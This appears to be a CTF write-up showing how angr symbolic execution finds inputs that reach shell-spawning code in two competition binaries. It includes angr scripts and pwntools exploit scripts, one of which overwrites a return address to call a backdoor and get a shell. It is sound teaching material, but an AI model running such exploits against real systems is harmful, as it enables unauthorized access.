AUTO PWN

First Post:

2021-03-31

Last Update:

2024-10-07


ref: https://angr.io/

ref: https://bbs.pediy.com/thread-266757.htm

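Introduction

CTF pwn challenges are getting harder to solve, and vulnerability discovery and exploitation are gradually shifting from manual work toward automation. This article walks through a few examples of automated discovery as a way to learn the technique.

The angr framework is a good choice for this. angr is an open-source Python framework for binary analysis. It uses symbolic execution, which analyzes a program to derive an input that makes a specific region of code execute. When a program is analyzed with symbolic execution, it runs on symbolic values as input rather than the concrete values used in a normal run. On reaching the target code, the analyzer has the corresponding path constraints, and a constraint solver then produces concrete values that trigger the target code.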
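To make the "path constraints, then solve" idea concrete, here is a minimal toy sketch in plain Python. It is not how angr works internally: the two constraints are invented for illustration, and a brute-force search stands in for the SMT solver a real symbolic execution engine would use.

```python
from itertools import product

# Toy path constraints: one predicate per branch taken on the way to the target.
# `b` is a candidate input, a tuple of byte values standing in for symbolic input.
# Both conditions are made up for this illustration.
path_constraints = [
    lambda b: (b[0] ^ 0x55) == 0x14,            # first branch condition
    lambda b: ((b[0] + b[1]) & 0xFF) == 0x90,   # second branch condition
]

def solve(constraints, n_bytes):
    """Return the first input satisfying every constraint, or None.

    Brute force over all byte tuples replaces a real constraint solver here.
    """
    for candidate in product(range(256), repeat=n_bytes):
        if all(check(candidate) for check in constraints):
            return bytes(candidate)
    return None

payload = solve(path_constraints, 2)
print(payload)  # b'AO'
```

A real engine collects such constraints automatically while stepping through the binary, which is what makes it practical for programs with thousands of branches.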

Source repository: https://github.com/angr/angr

Ask i0gan for the challenge attachments.

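Installing angr

To avoid conflicts with the pwntools library, we use angr by pulling its Docker image. Installing it directly with pip install angr also works.

`docker pull angr/angr`

Before starting: I run scripts inside the angr Docker container, so I wrote a bash script that runs our angr scripts, shown below, for use in Examples 1 and 2.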

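#!/bin/bash
# Author: i0gan
# Starts the angr docker container and runs the given script inside it
pwd=$(pwd)
# Require at least the script name as an argument
if [[ $# -lt 1 ]]; then
    echo "Usage: ./angr script.py"
    exit 1
fi
script=$1
# Mount the current directory at /mnt and run the script with the container's angr virtualenv
docker run -it -u angr --rm -v "$pwd":/mnt -w /mnt angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/mnt/$script" $2 $3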

Usage:

`./angr script.py`
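If you would rather launch the container from Python than from a shell wrapper, the same invocation can be expressed as an argument list. This is only a sketch: `build_angr_cmd` and `ANGR_PYTHON` are hypothetical names, and the paths and flags are copied from the bash script above.

```python
import os

# Interpreter path inside the angr/angr image, as used by the wrapper script.
ANGR_PYTHON = "/home/angr/.virtualenvs/angr/bin/python"

def build_angr_cmd(script, *args, workdir=None):
    """Build the docker command that runs `script` from `workdir` inside the container."""
    workdir = workdir or os.getcwd()
    return [
        "docker", "run", "-it", "-u", "angr", "--rm",
        "-v", f"{workdir}:/mnt",   # mount the working directory at /mnt
        "-w", "/mnt",
        "angr/angr",
        ANGR_PYTHON, f"/mnt/{script}",
        *args,                     # extra arguments forwarded to the script
    ]

print(" ".join(build_angr_cmd("script.py", workdir="/tmp/demo")))
```

The resulting list can be passed to `subprocess.run`, which avoids shell quoting issues with unusual file names.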

Example 1

From the finals of the 2021 Hongminggu Cup.

checksec:

Checksec file: pwn1
[*] '/run/media/i0gan/disk1/share/project/auto_pwn/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Running it:

~/share/project/auto_pwn  ./pwn1                                                                                                 
asdf
input your passwd:
asdfasdf
asdf
input your passwd:

The program logic is as follows:

int sub_804870E()
{
  int result; // eax
  char v1[16]; // [esp+Ch] [ebp-1Ch] BYREF
  int v2; // [esp+1Ch] [ebp-Ch]

  result = inputn();
  v2 = result;
  switch ( result )
  {
    case 1:
      puts("logging out...");
      result = ~dword_804A06C;
      dword_804A06C = ~dword_804A06C;
      break;
    case 2:
      if ( dword_804A06C )
        result = shell(); // the shell function
      else
        result = puts("please log in");
      break;
    case 0:
      puts("input your passwd:");
      result = sub_804859B((int)v1, 16); // read the password
      dword_804A06C = 1; // after a correct password, dword_804A06C is set to 1, which is required to get a shell
      break;
  }
  return result;
}

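We don't know what the password is, and we don't care. All we want is a shell, so how do we steer the control flow into the shell function? angr makes this easy.

Below is the location where shell is called. As long as execution reaches 0x08048783, we get a shell.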

.text:0804877A loc_804877A:                            ; CODE XREF: sub_804870E+19↑j
.text:0804877A                 mov     eax, ds:dword_804A06C
.text:0804877F                 test    eax, eax
.text:08048781                 jz      short loc_804878A
.text:08048783                 call    shell
.text:08048788                 jmp     short loc_804879A

So all we need is for execution to reach the target address and then dump the input that got it there. The dumped data is our payload.

The angr script pwn1_angr.py is as follows:

import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./pwn1')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x08048783) # call shell
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

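Run:

./angr pwn1_angr.py
310a320a

Here the data is printed in hexadecimal, so the payload is '\x31\x0a\x32\x0a', i.e. the two menu inputs 1 and 2. Option 1 flips dword_804A06C from 0 to a nonzero value (~0), so option 2 then passes the check and calls shell, with no password needed.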
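To see why this payload works, the menu can be modeled in a few lines of Python. This is a rough sketch based only on the decompiled code above. It assumes that inputn() parses like atoi (non-numeric input gives 0, which matches the sample session), that dword_804A06C starts at 0, and it does not model the password branch at all.

```python
def parse_choice(line: bytes) -> int:
    """atoi-like parse (assumed): leading digits only, anything else gives 0."""
    digits = b""
    for ch in line.strip():
        if ch not in b"0123456789":
            break
        digits += bytes([ch])
    return int(digits) if digits else 0

def reaches_shell(stdin_data: bytes) -> bool:
    """Replay menu choices against a model of sub_804870E."""
    logged_in = 0  # models dword_804A06C, assumed to start at 0
    for line in stdin_data.splitlines():
        choice = parse_choice(line)
        if choice == 1:
            logged_in = ~logged_in & 0xFFFFFFFF  # 32-bit bitwise NOT
        elif choice == 2:
            if logged_in:
                return True   # the call to shell() is reached
        elif choice == 0:
            return False      # password path is not modeled; stop here
    return False

payload = bytes.fromhex("310a320a")
print(payload, reaches_shell(payload))  # b'1\n2\n' True
```

Note that choosing option 1 twice flips the flag back to 0, so only an odd number of "log out" operations opens the path to shell.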

Test:

./pwn1
1
logging out...
2
sh-5.1$ whoami
i0gan

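Now that we have a payload that gets a shell, how do we automate both the discovery and the exploitation?

We simply have the script discover the payload locally first and then attack the remote target automatically, as follows.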

pwn1_exp.py

from pwn import *
import os
from binascii import a2b_hex

io = process('./pwn1')
print('Solving...')
# Run the angr script through the docker wrapper and capture the hex payload it prints
p = os.popen('./angr pwn1_angr.py').read().strip()
print('Found payload: [' + p + ']')
p = a2b_hex(p)  # hex string -> raw bytes
io.send(p)
print('Get shell')
io.sendline(b'whoami')
io.interactive()

Running the pwn1_exp.py script:

python pwn1_exp.py
[+] Starting local process './pwn1': pid 18152
Solving...
Found payload: [310a320a]
Get shell
[*] Switching to interactive mode
logging out...
i0gan
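Reading the solver's output with a bare `read()` works as long as the angr script prints nothing but the hex string. A slightly more defensive approach is to pick the last token that looks like hex. The sketch below is an assumption about what "robust" means here, and `extract_hex_payload` is a hypothetical helper, not part of pwntools or angr.

```python
import re

def extract_hex_payload(output: str) -> bytes:
    """Return the bytes encoded by the last all-hex token in `output`.

    Tokens are split on whitespace, so stray newlines or carriage
    returns around the payload are ignored.
    """
    tokens = [t for t in output.split()
              if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", t)]
    if not tokens:
        raise ValueError("no hex payload found in solver output")
    return bytes.fromhex(tokens[-1])

print(extract_hex_payload("310a320a\r\n"))  # b'1\n2\n'
```

One caveat: an ordinary word made only of hex digits (such as "dead") would also match, so this relies on the payload being printed last.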

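This experiment leaves room for improvement: we located the shell function by manual analysis, but we could also have the script find it automatically.

This example is fairly simple and doesn't feel much different from analyzing the binary by hand, so let's move on to a more useful one.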

Example 2

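From the 6th National Cyberspace Security Technology Competition.

After opening the binary in IDA and pressing F5 on the main function, IDA reports the following error: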


Decompilation failure:
8048764: too big function
Please refer to the manual to find appropriate actions

Switching to the assembly graph view reports this error:


The graph is too big (more than 1000 nodes) to be displayed on the screen.
Switching to text mode.
(you can change this limit in the graph options dialog)

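This happens because the function contains too many branch blocks, so IDA cannot generate the graph or pseudocode that would help us analyze it.

Here is an excerpt of the useful code: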


.text:080487C6
.text:080487C6 loc_80487C6:                            ; CODE XREF: main+51↑j
.text:080487C6                 cmp     [ebp+var_C], 13h
.text:080487CA                 jle     short loc_80487B7
.text:080487CC                 lea     eax, [ebp+s2]
.text:080487CF                 mov     dword ptr [eax], 4A494355h
.text:080487D5                 mov     dword ptr [eax+4], 49525545h
.text:080487DC                 sub     esp, 0Ch
.text:080487DF                 push    offset aEnterThePasswo_0 ; "Enter the password: "
.text:080487E4                 call    _puts
.text:080487E9                 add     esp, 10h
.text:080487EC                 sub     esp, 8
.text:080487EF                 lea     eax, [ebp+s1]
.text:080487F2                 push    eax
.text:080487F3                 push    offset a8s      ; "%8s"
.text:080487F8                 call    _scanf          ; reads 8 characters of input
.text:080487FD                 add     esp, 10h
.text:08048800                 mov     [ebp+var_10], 0
.text:08048807                 jmp     short loc_8048836

After the 8 characters are read, execution enters the function's branch blocks and keeps jumping back and forth among them.

.text:08048836 loc_8048836:                            ; CODE XREF: main+A3↑j
.text:08048836                 cmp     [ebp+var_10], 7
.text:0804883A                 jle     short loc_8048809
.text:0804883C                 lea     eax, [ebp+s1]
.text:0804883F                 add     eax, 1
.text:08048842                 movzx   eax, byte ptr [eax]
.text:08048845                 movzx   eax, al
.text:08048848                 and     eax, 10h
.text:0804884B                 test    eax, eax
.text:0804884D                 setnz   dl
.text:08048850                 lea     eax, [ebp+s2]
.text:08048853                 add     eax, 1
.text:08048856                 movzx   eax, byte ptr [eax]
.text:08048859                 movzx   eax, al
.text:0804885C                 and     eax, 10h
.text:0804885F                 test    eax, eax
.text:08048861                 setnz   al
.text:08048864                 xor     eax, edx
.text:08048866                 test    al, al
.text:08048868                 jz      loc_808E7DC
.text:0804886E                 call    aaz
.text:08048873                 lea     eax, [ebp+s1]
....
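The check in this block can be read as "does bit 0x10 of s1[1] differ from bit 0x10 of s2[1]?". The Python sketch below mirrors that one comparison. It decodes s2 from the two immediates stored at 0x080487CF and 0x080487D5, and it deliberately ignores whatever the loop at loc_8048809 does to the buffers, since the excerpt does not show it. The s1 values are hypothetical test inputs.

```python
import struct

# s2 as written by the two `mov dword ptr` instructions (little-endian).
s2 = struct.pack("<II", 0x4A494355, 0x49525545)

def bit_differs(s1: bytes, s2: bytes, index: int, mask: int) -> bool:
    """Mirror of the setnz / setnz / xor / test sequence.

    True  -> the jz is not taken, execution falls through to `call aaz`.
    False -> the jz is taken, execution jumps to loc_808E7DC.
    """
    return bool(s1[index] & mask) != bool(s2[index] & mask)

print(s2)                                     # b'UCIJEURI'
print(bit_differs(b"AAAAAAAA", s2, 1, 0x10))  # False
print(bit_differs(b"AXAAAAAA", s2, 1, 0x10))  # True
```

With one such test per bit per character, it is easy to see how the function grows past what IDA is willing to graph.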

However, one function turns out to contain a stack overflow:

int login_again()
{
  char s1[72]; // [esp+0h] [ebp-48h] BYREF

  setbuf(stdout, 0);
  setbuf(stderr, 0);
  setbuf(stdin, 0);
  puts("Enter the password again: ");
  scanf("%s", s1);
  if ( !strcmp(s1, "deadbeef") )
    puts("I think you can't get shell");
  else
    puts("Error.");
  return 0;
}

There is also a backdoor function:

int get_sh()
{
  return system("/bin/sh");
}
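The decompiler annotation on s1 ([ebp-48h]) gives the layout needed for the overflow: 0x48 bytes up to the saved ebp, 4 bytes of saved ebp, then the return address. As a rough sketch using only the standard library, the payload could be built as below. `build_overflow` is a hypothetical helper, and 0x08048665 is the get_sh address used in this article's exploit script.

```python
import struct

SCANF_WHITESPACE = b" \t\n\v\f\r"  # scanf("%s") stops reading at any of these

def build_overflow(ret_addr: int, buf_to_ebp: int = 0x48) -> bytes:
    """Pad up to saved ebp, overwrite it, then overwrite the return address."""
    padding = b"\x00" * buf_to_ebp         # fills s1 up to the saved ebp
    saved_ebp = struct.pack("<I", 0)       # value is irrelevant for this exploit
    ret = struct.pack("<I", ret_addr)      # 32-bit little-endian address
    payload = padding + saved_ebp + ret
    if any(b in SCANF_WHITESPACE for b in payload):
        raise ValueError("payload contains a byte that scanf(\"%s\") stops on")
    return payload

payload = build_overflow(0x08048665)
print(len(payload), payload[-4:].hex())  # 80 65860408
```

Null bytes are fine for scanf("%s"), which only terminates on whitespace. That is why zero padding works here even though it would not survive a strcpy-style copy.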

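If some input drives execution into login_again, we can exploit the overflow to get a shell. Steering execution straight to get_sh would be even simpler, but none of the branch blocks call get_sh, whereas login_again is called from the aas function.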

int __cdecl aas(const char *s1, const char *s2)
{
  int result; // eax

  if ( should_succeed && !strncmp(s1, s2, 8u) )
    result = login_again();                     // vul
  else
    result = puts("Error.");
  return result;
}

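aas is itself called from the branch blocks, so this resembles fuzzing: targeting a path related to the vulnerable function is far easier than exploring unrelated ones. We drive execution to login_again and then use the stack overflow to call the backdoor function.

As in Example 1, we only need the angr engine to find an input that makes execution reach login_again.

The angr script is as follows: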

auto_angr.py

import angr
from binascii import b2a_hex
import logging
import sys
logging.getLogger('angr').setLevel('INFO')
#logging.getLogger('angr').setLevel('CRITICAL')

def angr_main():
    pj = angr.Project('./auto')
    state = pj.factory.entry_state()
    simgr = pj.factory.simgr(state)
    simgr.explore(find = 0x0804867E) # call login_again
    p = simgr.found[0].posix.dumps(0)
    print(b2a_hex(p).decode(), end='')
angr_main()

Here we again rely on the angr wrapper script we wrote earlier.

Run it as follows:

./angr auto_angr.py
555859554b564e5a
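The hex string can be decoded and sanity-checked against the `%8s` format before it is used. This is a small sketch; `decode_password` is a hypothetical helper, not part of the original scripts.

```python
def decode_password(hex_output: str, max_len: int = 8) -> bytes:
    """Decode the solver's hex output and check that scanf("%8s") would accept it whole."""
    password = bytes.fromhex(hex_output.strip())
    if len(password) > max_len:
        raise ValueError("longer than the %8s field width")
    if any(ch in b" \t\n\v\f\r" for ch in password):
        raise ValueError("contains whitespace, scanf would stop early")
    return password

print(decode_password("555859554b564e5a"))  # b'UXYUKVNZ'
```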

So the payload we get is '\x55\x58\x59\x55\x4b\x56\x4e\x5a'. This input makes execution reach login_again, after which a simple stack overflow gets us a shell.

#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author: i0gan
from pwn import *
context.log_level = 'debug'
#io = remote('81.70.195.166', 10001)
io = process('./auto')
# Password found by angr; drives execution to login_again
payload = b'\x55\x58\x59\x55\x4b\x56\x4e\x5a'
io.send(payload)

# 0x48 bytes of padding + saved ebp, then overwrite the return address with get_sh
payload = b'\x00' * 0x48 + p32(0x0) + p32(0x08048665)
io.sendline(payload)
io.interactive()

Output:

[+] Starting local process './auto' argv=[b'./auto'] : pid 6957
[DEBUG] Sent 0x8 bytes:
    b'UXYUKVNZ'
[DEBUG] Sent 0x51 bytes:
    00000000  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    *
    00000040  00 00 00 00  00 00 00 00  00 00 00 00  65 86 04 08  │····│····│····│e···│
    00000050  0a                                                  │·│
    00000051
[*] Switching to interactive mode
[DEBUG] Received 0x37 bytes:
    b'Enter the password: \n'
    b'Enter the password again: \n'
    b'Error.\n'
Enter the password: 
Enter the password again: 
Error.
$ whoami
[DEBUG] Sent 0x7 bytes:
    b'whoami\n'
[DEBUG] Received 0x6 bytes:
    b'i0gan\n'
i0gan

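Summary

In the two examples above we never analyzed how the program processes its input; we only cared about the result. Example 2 is extremely hard to analyze and debug by hand because the program is so large, and this is where AUTO PWN techniques make it easy to find a payload. My scripts still mix in some parameters obtained by manual analysis, but only to make the idea easier to follow. You could also develop an automated system of your own that recognizes the program logic and builds the payload automatically, which is a direction worth continued study.

Many pwn challenges today call for this approach. For example, for babypac from starctf (*CTF, an XCTF event), the angr engine easily finds a payload that triggers the vulnerability. That challenge is an aarch-architecture pwn, but angr is cross-architecture, so symbolic execution works just the same. The same goes for VM pwn challenges: if you don't feel like analyzing the program logic and just want to quickly find which branch block each opcode maps to, this technique is a perfect fit.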
